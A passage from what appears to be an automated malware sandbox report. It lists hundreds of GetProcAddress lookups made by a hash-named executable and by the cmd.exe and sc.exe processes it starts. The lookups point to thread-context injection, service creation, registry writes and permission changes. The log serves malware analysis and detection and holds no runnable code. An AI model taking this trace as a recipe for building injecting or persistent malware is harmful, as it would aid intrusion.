\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00002544)\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002544)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003068)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00003068)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00003068)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00003068)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003068)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004276)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter 